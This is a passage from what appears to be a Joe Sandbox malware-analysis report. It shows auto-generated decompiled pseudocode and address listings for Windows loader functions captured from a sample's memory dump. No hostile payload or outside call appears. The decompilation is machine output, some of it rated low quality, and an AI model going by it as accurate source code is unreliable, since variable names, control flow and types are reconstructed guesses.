							if(_t65 != _t92) {
								goto L18;
							}
							_v1060 =  *((intOrPtr*)(_t97 + 8));
							__eflags =  *((intOrPtr*)(_t97 + 8)) - _t92;
							if( *((intOrPtr*)(_t97 + 8)) > _t92) {
								_t101 = 0x80000005;
							} else {
								_t35 = _t97 + 0xc; // 0xc
								E1D7888C0( &_v1056, _t35,  *((intOrPtr*)(_t97 + 8)));
								_t105 = _t105 + 0xc;
							}
							goto L26;
						} else {
							_t93 = 4;
							if(_t65 != _t93) {
								__eflags = _t65 - 0xb;
								if(_t65 == 0xb) {
									L18:
									_t101 = 0xc0000024;
									goto L26;
								}
								__eflags = _t65 - 1;
								if(_t65 == 1) {
									__eflags =  &_v1056 & 0x00000003;
									if(__eflags == 0) {
										_t22 = _t97 + 0xc; // 0xc
										_v1060 = _t93;
										_v1044 = _t22;
										_v1048 =  *((intOrPtr*)(_t97 + 8));
										_v1046 =  *((intOrPtr*)(_t97 + 8));
										_push( &_v1056);
										_push(0);
										_push( &_v1048);
										_t101 = E1D7707D0(_t85, _t97, _t101, __eflags);
									} else {
										_t101 = 0x80000002;
									}
									goto L26;
								}
								goto L18;
							} else {
								if( *((intOrPtr*)(_t97 + 8)) != _t93) {
									_t101 = 0xc0000004;
								} else {
									_v1060 = _t93;
									_v1056 =  *((intOrPtr*)(_t97 + 0xc));
								}
								L26:
								if(_t85 != 0) {
									E1D753BC0( *( *[fs:0x30] + 0x18), 0, _t85);
								}
								L28:
								if(_t101 < 0) {
									goto L31;
								}
								_t57 = _v1056;
								if(_t57 < 0xffffffff || _t57 > 2) {
									goto L31;
								} else {
									L33:
									_t49 = _v1056;
									if(_t49 == 0xffffffff) {
										 *0x1d8368cc =  *0x1d8368cc | 0xffffffff;
										__eflags =  *0x1d8368cc;
									} else {
										if(_t49 == 1) {
											 *0x1d8368cc = 0x2000;
										} else {
											if(_t49 == 2) {
												 *0x1d8368cc = 0x10;
											} else {
												 *0x1d8368cc =  *0x1d8368cc & 0x00000000;
											}
										}
									}
									_pop(_t96);
									_pop(_t99);
									_pop(_t84);
									return E1D784B50(_t49, _t84, _v8 ^ _t105, _t94, _t96, _t99);
								}
							}
						}
					}
				}
			}


































                                                                                                                              0x1d7c3963
                                                                                                                              0x1d7c3970
                                                                                                                              0x1d7c3978
                                                                                                                              0x1d7c397a
                                                                                                                              0x1d7c3982
                                                                                                                              0x1d7c3b33
                                                                                                                              0x1d7c3b33
                                                                                                                              0x1d7c3b45
                                                                                                                              0x1d7c3b4c
                                                                                                                              0x1d7c3b4e
                                                                                                                              0x1d7c3b4e
                                                                                                                              0x00000000
                                                                                                                              0x1d7c39a1
                                                                                                                              0x1d7c39a5
                                                                                                                              0x1d7c39a6
                                                                                                                              0x1d7c39ab
                                                                                                                              0x1d7c39b1
                                                                                                                              0x1d7c39b2
                                                                                                                              0x1d7c39b8
                                                                                                                              0x1d7c39b9
                                                                                                                              0x1d7c39bf
                                                                                                                              0x1d7c39c3
                                                                                                                              0x1d7c3a00
                                                                                                                              0x1d7c3a06
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c3a0c
                                                                                                                              0x1d7c3a0c
                                                                                                                              0x1d7c3a0c
                                                                                                                              0x1d7c3a16
                                                                                                                              0x1d7c3a19
                                                                                                                              0x1d7c3a1b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c3a21
                                                                                                                              0x1d7c3a36
                                                                                                                              0x1d7c3a38
                                                                                                                              0x1d7c3a3a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c3a44
                                                                                                                              0x1d7c3a46
                                                                                                                              0x1d7c3a47
                                                                                                                              0x1d7c3a48
                                                                                                                              0x1d7c3a49
                                                                                                                              0x1d7c3a4f
                                                                                                                              0x1d7c3a50
                                                                                                                              0x1d7c3a59
                                                                                                                              0x1d7c3a5b
                                                                                                                              0x1d7c3a5d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c3a63
                                                                                                                              0x1d7c3a69
                                                                                                                              0x00000000
                                                                                                                              0x1d7c3a6f
                                                                                                                              0x1d7c3a7b
                                                                                                                              0x00000000
                                                                                                                              0x1d7c3a7b
                                                                                                                              0x1d7c3a69
                                                                                                                              0x00000000
                                                                                                                              0x1d7c39c5
                                                                                                                              0x1d7c39c5
                                                                                                                              0x1d7c39c7
                                                                                                                              0x1d7c39c7
                                                                                                                              0x1d7c39cd
                                                                                                                              0x1d7c3ae0
                                                                                                                              0x1d7c3ae1
                                                                                                                              0x1d7c3ae3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c3ae8
                                                                                                                              0x1d7c3aec
                                                                                                                              0x1d7c3aef
                                                                                                                              0x1d7c3b07
                                                                                                                              0x1d7c3af1
                                                                                                                              0x1d7c3af4
                                                                                                                              0x1d7c3afd
                                                                                                                              0x1d7c3b02
                                                                                                                              0x1d7c3b02
                                                                                                                              0x00000000
                                                                                                                              0x1d7c39dc
                                                                                                                              0x1d7c39de
                                                                                                                              0x1d7c39e1
                                                                                                                              0x1d7c3a8c
                                                                                                                              0x1d7c3a8f
                                                                                                                              0x1d7c3a96
                                                                                                                              0x1d7c3a96
                                                                                                                              0x00000000
                                                                                                                              0x1d7c3a96
                                                                                                                              0x1d7c3a91
                                                                                                                              0x1d7c3a94
                                                                                                                              0x1d7c3aa1
                                                                                                                              0x1d7c3aa3
                                                                                                                              0x1d7c3aac
                                                                                                                              0x1d7c3aaf
                                                                                                                              0x1d7c3ab3
                                                                                                                              0x1d7c3abb
                                                                                                                              0x1d7c3ac4
                                                                                                                              0x1d7c3acd
                                                                                                                              0x1d7c3ace
                                                                                                                              0x1d7c3ad4
                                                                                                                              0x1d7c3ada
                                                                                                                              0x1d7c3aa5
                                                                                                                              0x1d7c3aa5
                                                                                                                              0x1d7c3aa5
                                                                                                                              0x00000000
                                                                                                                              0x1d7c3aa3
                                                                                                                              0x00000000
                                                                                                                              0x1d7c39e7
                                                                                                                              0x1d7c39ea
                                                                                                                              0x1d7c3a82
                                                                                                                              0x1d7c39f0
                                                                                                                              0x1d7c39f0
                                                                                                                              0x1d7c39f7
                                                                                                                              0x1d7c39f7
                                                                                                                              0x1d7c3b0c
                                                                                                                              0x1d7c3b0e
                                                                                                                              0x1d7c3b1c
                                                                                                                              0x1d7c3b1c
                                                                                                                              0x1d7c3b21
                                                                                                                              0x1d7c3b23
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c3b25
                                                                                                                              0x1d7c3b2c
                                                                                                                              0x00000000
                                                                                                                              0x1d7c3b53
                                                                                                                              0x1d7c3b53
                                                                                                                              0x1d7c3b53
                                                                                                                              0x1d7c3b5a
                                                                                                                              0x1d7c3b87
                                                                                                                              0x1d7c3b87
                                                                                                                              0x1d7c3b5c
                                                                                                                              0x1d7c3b5f
                                                                                                                              0x1d7c3b7b
                                                                                                                              0x1d7c3b61
                                                                                                                              0x1d7c3b64
                                                                                                                              0x1d7c3b6f
                                                                                                                              0x1d7c3b66
                                                                                                                              0x1d7c3b66
                                                                                                                              0x1d7c3b66
                                                                                                                              0x1d7c3b64
                                                                                                                              0x1d7c3b5f
                                                                                                                              0x1d7c3b95
                                                                                                                              0x1d7c3b96
                                                                                                                              0x1d7c3b97
                                                                                                                              0x1d7c3ba2
                                                                                                                              0x1d7c3ba2
                                                                                                                              0x1d7c3b2c
                                                                                                                              0x1d7c39e1
                                                                                                                              0x1d7c39cd
                                                                                                                              0x1d7c39c3

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CWDIllegalInDLLSearch
                                                                                                                              • API String ID: 0-473384322
                                                                                                                              • Opcode ID: ae39f1d424704813b67e35a5e56eeec289bd09619434a4ca09578b6d48f77dbe
                                                                                                                              • Instruction ID: 8bc25c70932fc94ea1b166ffca5bef4d467b8ea2027a9fdef46ef1185d79c7fb
                                                                                                                              • Opcode Fuzzy Hash: ae39f1d424704813b67e35a5e56eeec289bd09619434a4ca09578b6d48f77dbe
                                                                                                                              • Instruction Fuzzy Hash: 76519E76908757AFD311DF14D885B2AB7E8FB44734F014A2AF969DB290D320EA44CB93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7CF42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 53%
                                                                                                                              			E1D7CF42F(short* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				char* _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				char _v44;
				char _v52;
				char _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				signed int _v76;
				intOrPtr _v84;
				signed int _t48;
				signed int _t55;
				intOrPtr _t84;
				short _t87;
				intOrPtr _t89;
				void* _t97;
				intOrPtr _t98;
				signed int _t101;

				_t90 = __ecx;
				_v76 = _v76 & 0x00000000;
				_t87 = 0;
				_v72 = __edx;
				if(__ecx == 0 || __edx == 0 || _a4 == 0) {
					_t48 = 0xc000000d;
					goto L26;
				} else {
					if( *__ecx == 0x5c) {
						E1D785050(__ecx,  &_v68, __ecx);
						L8:
						_v24 = _v24 & 0x00000000;
						_v12 = _v12 & 0x00000000;
						_v8 = _v8 & 0x00000000;
						_push(0x4021);
						_v20 =  &_v68;
						_push(7);
						_push( &_v52);
						_v28 = 0x18;
						_push( &_v28);
						_push(0x100001);
						_v16 = 0x40;
						_push( &_v76);
						_t55 = E1D782CE0();
						_t101 = _t55;
						if(_t87 == 0) {
							L13:
							if(_t101 >= 0) {
								_t97 = E1D755D90(_t90,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x410);
								if(_t97 != 0) {
									E1D785050(_t90,  &_v60, _v72);
									_push(0);
									_push( &_v68);
									_push(1);
									_push(3);
									_push(0x410);
									_push(_t97);
									_push( &_v60);
									_push(0);
									_push(0);
									_push(0);
									_push(_v84);
									_t101 = E1D782D00();
									if(_t101 >= 0) {
										_t66 =  *(_t97 + 0x3c);
										if( *(_t97 + 0x3c) <= 0x104) {
											_t89 = E1D755D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t66 + 4);
											if(_t89 != 0) {
												_t39 = _t97 + 0x5e; // 0x5e
												E1D7888C0(_t89, _t39,  *(_t97 + 0x3c));
												 *((short*)(_t89 + ( *(_t97 + 0x3c) >> 1) * 2)) = 0;
												 *_a4 = _t89;
											} else {
												_t101 = 0xc0000017;
											}
										}
									}
									E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t97);
								} else {
									_t101 = 0xc0000017;
								}
							}
							L22:
							if(_v76 != 0) {
								_push(_v76);
								E1D782A80();
							}
							_t48 = _t101;
							L26:
							return _t48;
						}
						_t98 = _v32;
						if(_t98 != 0) {
							asm("lock xadd [edi], eax");
							if((_t55 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t98 + 4)));
								E1D782A80();
								E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t98);
							}
						}
						E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t87);
						goto L13;
					}
					_push( &_v44);
					_push(0);
					_push( &_v68);
					_t90 = 2;
					_t101 = E1D761C48(__ecx, __ecx);
					if(_t101 < 0) {
						goto L22;
					} else {
						_t84 = _v44;
						_t87 = _v64;
						if(_t84 != 0) {
							_v68 = _t84;
							_v64 = _v40;
						}
						goto L8;
					}
				}
			}



























                                                                                                                              0x1d7cf42f
                                                                                                                              0x1d7cf43a
                                                                                                                              0x1d7cf443
                                                                                                                              0x1d7cf445
                                                                                                                              0x1d7cf44c
                                                                                                                              0x1d7cf607
                                                                                                                              0x00000000
                                                                                                                              0x1d7cf463
                                                                                                                              0x1d7cf467
                                                                                                                              0x1d7cf4a9
                                                                                                                              0x1d7cf4ae
                                                                                                                              0x1d7cf4ae
                                                                                                                              0x1d7cf4b7
                                                                                                                              0x1d7cf4bc
                                                                                                                              0x1d7cf4c1
                                                                                                                              0x1d7cf4c6
                                                                                                                              0x1d7cf4ce
                                                                                                                              0x1d7cf4d0
                                                                                                                              0x1d7cf4d5
                                                                                                                              0x1d7cf4dd
                                                                                                                              0x1d7cf4de
                                                                                                                              0x1d7cf4e7
                                                                                                                              0x1d7cf4ef
                                                                                                                              0x1d7cf4f0
                                                                                                                              0x1d7cf4f5
                                                                                                                              0x1d7cf4f9
                                                                                                                              0x1d7cf536
                                                                                                                              0x1d7cf538
                                                                                                                              0x1d7cf554
                                                                                                                              0x1d7cf558
                                                                                                                              0x1d7cf56d
                                                                                                                              0x1d7cf578
                                                                                                                              0x1d7cf579
                                                                                                                              0x1d7cf57a
                                                                                                                              0x1d7cf57c
                                                                                                                              0x1d7cf57e
                                                                                                                              0x1d7cf57f
                                                                                                                              0x1d7cf584
                                                                                                                              0x1d7cf585
                                                                                                                              0x1d7cf586
                                                                                                                              0x1d7cf587
                                                                                                                              0x1d7cf588
                                                                                                                              0x1d7cf591
                                                                                                                              0x1d7cf595
                                                                                                                              0x1d7cf597
                                                                                                                              0x1d7cf59f
                                                                                                                              0x1d7cf5b5
                                                                                                                              0x1d7cf5b9
                                                                                                                              0x1d7cf5c5
                                                                                                                              0x1d7cf5ca
                                                                                                                              0x1d7cf5d9
                                                                                                                              0x1d7cf5e0
                                                                                                                              0x1d7cf5bb
                                                                                                                              0x1d7cf5bb
                                                                                                                              0x1d7cf5bb
                                                                                                                              0x1d7cf5b9
                                                                                                                              0x1d7cf59f
                                                                                                                              0x1d7cf5ee
                                                                                                                              0x1d7cf55a
                                                                                                                              0x1d7cf55a
                                                                                                                              0x1d7cf55a
                                                                                                                              0x1d7cf558
                                                                                                                              0x1d7cf5f3
                                                                                                                              0x1d7cf5f8
                                                                                                                              0x1d7cf5fa
                                                                                                                              0x1d7cf5fe
                                                                                                                              0x1d7cf5fe
                                                                                                                              0x1d7cf603
                                                                                                                              0x1d7cf60c
                                                                                                                              0x1d7cf612
                                                                                                                              0x1d7cf612
                                                                                                                              0x1d7cf4fb
                                                                                                                              0x1d7cf501
                                                                                                                              0x1d7cf506
                                                                                                                              0x1d7cf50a
                                                                                                                              0x1d7cf50c
                                                                                                                              0x1d7cf50f
                                                                                                                              0x1d7cf520
                                                                                                                              0x1d7cf520
                                                                                                                              0x1d7cf50a
                                                                                                                              0x1d7cf531
                                                                                                                              0x00000000
                                                                                                                              0x1d7cf531
                                                                                                                              0x1d7cf46f
                                                                                                                              0x1d7cf470
                                                                                                                              0x1d7cf475
                                                                                                                              0x1d7cf478
                                                                                                                              0x1d7cf47e
                                                                                                                              0x1d7cf482
                                                                                                                              0x00000000
                                                                                                                              0x1d7cf488
                                                                                                                              0x1d7cf488
                                                                                                                              0x1d7cf48c
                                                                                                                              0x1d7cf493
                                                                                                                              0x1d7cf495
                                                                                                                              0x1d7cf49d
                                                                                                                              0x1d7cf49d
                                                                                                                              0x00000000
                                                                                                                              0x1d7cf493
                                                                                                                              0x1d7cf482

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 0-2766056989
                                                                                                                              • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                              • Instruction ID: 4e29a1cde3d82b8b0b0345cd6e77578dbf83bbf0d055057eb8377863c2283e00
                                                                                                                              • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                              • Instruction Fuzzy Hash: 35518C7250A746AFD7128F14D885F6BB7E8FF84720F11092AFA44972A0D7B5E904CB93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D77BB5B Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 21%
                                                                                                                              			E1D77BB5B(void* __ecx, void* __edx, void* __eflags) {
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				char _v68;
				char _v76;
				char _v84;
				char _v88;
				signed char _t30;
				signed char _t31;
				signed int _t35;
				signed char _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				signed char* _t70;
				intOrPtr _t73;

				_t62 = __edx;
				_t73 =  *[fs:0x30];
				_t70 =  *((intOrPtr*)(_t73 + 0x10)) + 0x30;
				E1D785050(__ecx, 0x1d834ff8, 0);
				E1D785050(__ecx, 0x1d834ff0, 0);
				_t30 =  *((intOrPtr*)(_t73 + 3));
				if((_t30 & 0x00000010) != 0) {
					__eflags =  *_t70;
					if(__eflags == 0) {
						goto L1;
					}
					_t61 =  *_t70;
					 *0x1d834ff8 = _t61;
					_t31 = _t70[4];
					 *0x1d834ffc = _t31;
					 *0x1d834ff4 = _t31;
					_push( &_v84);
					 *0x1d83391c = 0x29;
					_push( &_v76);
					 *0x1d834ff0 = _t61;
					_push( &_v88);
					_t63 = 4;
					_t35 = E1D7CD53C(_t63, __eflags);
					__eflags = _t35 | 0x10000000;
					if((_t35 | 0x10000000) < 0) {
						L10:
						E1D7CCDB0(0x1000);
						L11:
						_push( &_v68);
						_push( &_v60);
						_push( &_v88);
						_t64 = 7;
						__eflags = E1D7CD53C(_t64, __eflags) | 0x10000000;
						if(__eflags >= 0) {
							__eflags = _v88 - 0x70001;
							if(__eflags == 0) {
								 *0x1d83391c =  *0x1d83391c | 0x00000002;
								__eflags =  *0x1d83391c;
							}
						}
						_push( &_v52);
						_push( &_v44);
						_push( &_v88);
						_t65 = 0x13;
						__eflags = E1D7CD53C(_t65, __eflags) | 0x10000000;
						if(__eflags >= 0) {
							__eflags = _v88 - 0x130001;
							if(__eflags == 0) {
								 *0x1d83391c =  *0x1d83391c | 0x00000040;
								__eflags =  *0x1d83391c;
							}
						}
						_push( &_v36);
						_push( &_v28);
						_push( &_v88);
						_t66 = 0x20;
						__eflags = E1D7CD53C(_t66, __eflags) | 0x10000000;
						if(__eflags >= 0) {
							__eflags = _v88 - 0x200001;
							if(__eflags == 0) {
								 *0x1d83391c =  *0x1d83391c | 0x00000004;
								__eflags =  *0x1d83391c;
							}
						}
						_push( &_v20);
						_push( &_v12);
						_push( &_v88);
						_t67 = 0x36;
						_t30 = E1D7CD53C(_t67, __eflags) | 0x10000000;
						__eflags = _t30;
						if(_t30 >= 0) {
							__eflags = _v88 - 0x360001;
							if(_v88 == 0x360001) {
								 *0x1d83391c =  *0x1d83391c | 0x00000100;
							}
						}
						L3:
						return _t30;
					}
					__eflags = _v88 - 0x40001;
					if(__eflags == 0) {
						goto L10;
					} else {
						 *0x1d83391c =  *0x1d83391c & 0xfffffffe;
						goto L11;
					}
				}
				L1:
				if((_t30 & 0x00000002) != 0) {
					_t30 = 0;
					 *_t70 = 0;
				} else {
					if( *_t70 != 0) {
						_t30 = E1D77D450(_t62, _t70);
					}
				}
				goto L3;
			}


























                                                                                                                              0x1d77bb5b
                                                                                                                              0x1d77bb68
                                                                                                                              0x1d77bb7b
                                                                                                                              0x1d77bb7e
                                                                                                                              0x1d77bb89
                                                                                                                              0x1d77bb8e
                                                                                                                              0x1d77bb93
                                                                                                                              0x1d7b76c5
                                                                                                                              0x1d7b76c8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b76ce
                                                                                                                              0x1d7b76d0
                                                                                                                              0x1d7b76d6
                                                                                                                              0x1d7b76d9
                                                                                                                              0x1d7b76de
                                                                                                                              0x1d7b76e7
                                                                                                                              0x1d7b76ec
                                                                                                                              0x1d7b76f6
                                                                                                                              0x1d7b76fb
                                                                                                                              0x1d7b7701
                                                                                                                              0x1d7b7704
                                                                                                                              0x1d7b7705
                                                                                                                              0x1d7b770f
                                                                                                                              0x1d7b7711
                                                                                                                              0x1d7b7726
                                                                                                                              0x1d7b772b
                                                                                                                              0x1d7b7730
                                                                                                                              0x1d7b7734
                                                                                                                              0x1d7b7739
                                                                                                                              0x1d7b773e
                                                                                                                              0x1d7b7741
                                                                                                                              0x1d7b7747
                                                                                                                              0x1d7b7749
                                                                                                                              0x1d7b774b
                                                                                                                              0x1d7b7753
                                                                                                                              0x1d7b7755
                                                                                                                              0x1d7b7755
                                                                                                                              0x1d7b7755
                                                                                                                              0x1d7b7753
                                                                                                                              0x1d7b7760
                                                                                                                              0x1d7b7765
                                                                                                                              0x1d7b776a
                                                                                                                              0x1d7b776d
                                                                                                                              0x1d7b7773
                                                                                                                              0x1d7b7775
                                                                                                                              0x1d7b7777
                                                                                                                              0x1d7b777f
                                                                                                                              0x1d7b7781
                                                                                                                              0x1d7b7781
                                                                                                                              0x1d7b7781
                                                                                                                              0x1d7b777f
                                                                                                                              0x1d7b778c
                                                                                                                              0x1d7b7791
                                                                                                                              0x1d7b7796
                                                                                                                              0x1d7b7799
                                                                                                                              0x1d7b779f
                                                                                                                              0x1d7b77a1
                                                                                                                              0x1d7b77a3
                                                                                                                              0x1d7b77ab
                                                                                                                              0x1d7b77ad
                                                                                                                              0x1d7b77ad
                                                                                                                              0x1d7b77ad
                                                                                                                              0x1d7b77ab
                                                                                                                              0x1d7b77b8
                                                                                                                              0x1d7b77bd
                                                                                                                              0x1d7b77c2
                                                                                                                              0x1d7b77c5
                                                                                                                              0x1d7b77cb
                                                                                                                              0x1d7b77cb
                                                                                                                              0x1d7b77cd
                                                                                                                              0x1d7b77d3
                                                                                                                              0x1d7b77db
                                                                                                                              0x1d7b77e1
                                                                                                                              0x1d7b77e1
                                                                                                                              0x1d7b77db
                                                                                                                              0x1d77bba2
                                                                                                                              0x1d77bba8
                                                                                                                              0x1d77bba8
                                                                                                                              0x1d7b7713
                                                                                                                              0x1d7b771b
                                                                                                                              0x00000000
                                                                                                                              0x1d7b771d
                                                                                                                              0x1d7b771d
                                                                                                                              0x00000000
                                                                                                                              0x1d7b771d
                                                                                                                              0x1d7b771b
                                                                                                                              0x1d77bb99
                                                                                                                              0x1d77bb9b
                                                                                                                              0x1d77bba9
                                                                                                                              0x1d77bbab
                                                                                                                              0x1d77bb9d
                                                                                                                              0x1d77bba0
                                                                                                                              0x1d77bbb1
                                                                                                                              0x1d77bbb1
                                                                                                                              0x1d77bba0
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializeProcess
                                                                                                                              • API String ID: 0-2689506271
                                                                                                                              • Opcode ID: 37f0cf56d3343b72d12ef6cc8bb0d74cf30413611176287ae8d390b19a77ea67
                                                                                                                              • Instruction ID: a643b6b3ed74648e414c16a771fb4f9d05c91f6901a44930f9ffb9c5fbbc373b
                                                                                                                              • Opcode Fuzzy Hash: 37f0cf56d3343b72d12ef6cc8bb0d74cf30413611176287ae8d390b19a77ea67
                                                                                                                              • Instruction Fuzzy Hash: 5641C476508345EFC712CA55E889ABBB3ECEB48774F048D2BE695D2250D3B0E6448F93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7C9429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 92%
                                                                                                                              			E1D7C9429(void* __edx) {
				intOrPtr _v8;
				signed short* _v12;
				void* __ecx;
				void* _t16;
				signed int _t17;
				intOrPtr _t20;
				void** _t21;
				signed int _t22;
				void* _t24;
				void** _t30;
				signed int _t31;
				void* _t35;
				void* _t36;
				intOrPtr _t37;
				void* _t38;
				void* _t39;
				intOrPtr _t42;
				signed int _t45;
				void* _t47;
				void* _t53;
				void* _t54;
				signed short* _t55;
				signed int _t60;
				signed short* _t65;
				void* _t66;
				void* _t67;

				_push(_t39);
				_push(_t39);
				_v8 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t53 = E1D755D90(_t39,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x24);
				if(_t53 == 0) {
					L21:
					_t16 = 0xc0000017;
				} else {
					_t17 = 9;
					memset(_t53, 0, _t17 << 2);
					_t67 = _t66 + 0xc;
					_t42 =  *0x1d711b98; // 0x1a0018
					 *((intOrPtr*)(_t53 + 8)) = _t42;
					_t20 =  *0x1d711b9c; // 0x1d724444
					 *((intOrPtr*)(_t53 + 0xc)) = _t20;
					_t21 =  *0x1d835244; // 0x0
					if( *_t21 != 0x1d835240) {
						L20:
						_push(3);
						asm("int 0x29");
						goto L21;
					} else {
						 *_t53 = 0x1d835240;
						_t65 = 0x1d835000;
						 *(_t53 + 4) = _t21;
						 *_t21 = _t53;
						 *0x1d835244 = _t53;
						if( *0x1d835000 == 0) {
							L19:
							_t16 = 0;
						} else {
							_t54 = 0x20;
							do {
								_t35 = 9;
								while(1) {
									_t22 =  *_t65 & 0x0000ffff;
									_t45 = _t22;
									if(_t22 != _t54 && _t22 != _t35) {
										break;
									}
									_t65 =  &(_t65[1]);
								}
								_t55 = _t65;
								_v12 = _t55;
								if(_t22 == 0) {
									goto L19;
								} else {
									_t60 = 9;
									_t36 = 0x20;
									while(_t45 != _t36 && _t45 != _t60) {
										_t65 =  &(_t65[1]);
										_t31 =  *_t65 & 0x0000ffff;
										_t45 = _t31;
										if(_t31 != 0) {
											continue;
										}
										break;
									}
									_t37 = _v8;
									if(_t55 == _t65) {
										goto L19;
									} else {
										 *_t65 = 0;
										_t24 = E1D7879A0(_t55, L"verifier.dll");
										_pop(_t47);
										if(_t24 == 0) {
											goto L18;
										} else {
											_t38 = E1D755D90(_t47, _t37, 0, 0x24);
											if(_t38 == 0) {
												goto L21;
											} else {
												memset(_t38, 0, _t60 << 2);
												_t67 = _t67 + 0xc;
												_t11 = _t38 + 8; // 0x8
												E1D785050(_t11, _t11, _v12);
												_t30 =  *0x1d835244; // 0x0
												if( *_t30 != 0x1d835240) {
													goto L20;
												} else {
													 *_t38 = 0x1d835240;
													 *(_t38 + 4) = _t30;
													 *_t30 = _t38;
													 *0x1d835244 = _t38;
													goto L18;
												}
											}
										}
									}
								}
								goto L22;
								L18:
								_t65 =  &(_t65[1]);
								_t54 = 0x20;
							} while ( *_t65 != 0);
							goto L19;
						}
					}
				}
				L22:
				return _t16;
			}





























                                                                                                                              0x1d7c942e
                                                                                                                              0x1d7c942f
                                                                                                                              0x1d7c9442
                                                                                                                              0x1d7c944a
                                                                                                                              0x1d7c944e
                                                                                                                              0x1d7c955d
                                                                                                                              0x1d7c955d
                                                                                                                              0x1d7c9454
                                                                                                                              0x1d7c9456
                                                                                                                              0x1d7c945d
                                                                                                                              0x1d7c945d
                                                                                                                              0x1d7c945f
                                                                                                                              0x1d7c9465
                                                                                                                              0x1d7c946d
                                                                                                                              0x1d7c9472
                                                                                                                              0x1d7c9475
                                                                                                                              0x1d7c947c
                                                                                                                              0x1d7c9558
                                                                                                                              0x1d7c9558
                                                                                                                              0x1d7c955b
                                                                                                                              0x00000000
                                                                                                                              0x1d7c9482
                                                                                                                              0x1d7c9482
                                                                                                                              0x1d7c9484
                                                                                                                              0x1d7c9489
                                                                                                                              0x1d7c948c
                                                                                                                              0x1d7c9496
                                                                                                                              0x1d7c949c
                                                                                                                              0x1d7c9554
                                                                                                                              0x1d7c9554
                                                                                                                              0x1d7c94a2
                                                                                                                              0x1d7c94a4
                                                                                                                              0x1d7c94a5
                                                                                                                              0x1d7c94a7
                                                                                                                              0x1d7c94a8
                                                                                                                              0x1d7c94a8
                                                                                                                              0x1d7c94ab
                                                                                                                              0x1d7c94b0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c94b7
                                                                                                                              0x1d7c94b7
                                                                                                                              0x1d7c94bc
                                                                                                                              0x1d7c94be
                                                                                                                              0x1d7c94c4
                                                                                                                              0x00000000
                                                                                                                              0x1d7c94ca
